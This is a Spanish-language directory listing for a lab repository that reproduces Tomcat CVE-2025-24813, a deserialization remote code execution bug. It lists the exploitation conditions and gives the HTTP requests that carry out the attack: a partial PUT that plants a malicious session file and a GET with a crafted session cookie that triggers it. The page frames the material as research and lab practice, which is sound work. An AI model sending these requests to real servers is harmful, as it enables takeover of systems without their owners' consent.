Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24813 — tomcat CVE-2025-24813 entorno RCE de deserialización | Kitploit
Herramientas/GitHubGitHub/x1ongsec/cve-2025-24813
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubx1ongsec/cve-2025-24813

CVE-2025-24813

tomcat CVE-2025-24813 entorno RCE de deserialización

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Descripción

Este repositorio es un entorno de reproducción para la última RCE de Tomcat CVE-2025-24813.

¡Solo para fines de aprendizaje e investigación!

Condiciones de explotación

  • La aplicación tiene habilitada la función de escritura de DefaultServlet, que está desactivada por defecto
  • La aplicación admite solicitudes PUT parciales, lo que permite escribir datos de serialización maliciosos en el archivo de sesión; esta función está activada por defecto
  • La aplicación utiliza la persistencia de sesión en archivos de Tomcat y usa la ubicación de almacenamiento de sesión predeterminada, lo que requiere configuración adicional
  • La aplicación incluye una biblioteca con vulnerabilidades de deserialización, como commons-collections presente en el classpath; esta condición depende de si la implementación del negocio depende de bibliotecas con cadenas de explotación de deserialización

Este entorno ya tiene habilitadas las condiciones necesarias para la reproducción anterior

Iniciar tomcat

Linux:

root@kitploit:~
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run

Windows:

root@kitploit:~
apache-tomcat-9.0.98/bin/catalina.bat run

Acceder a: http://127.0.0.1:9001/

image

POC

Genere un archivo de serialización malicioso y súbalo con el siguiente paquete. Tenga en cuenta que el valor del fragmento de Range debe coincidir con Length y ser mayor que la longitud actual del archivo.

root@kitploit:~
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{contenido del archivo de deserialización}}}

Use el siguiente poc para activarlo:

root@kitploit:~
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
image image

Referencia: https://forum.butian.net/article/674

Descargar herramienta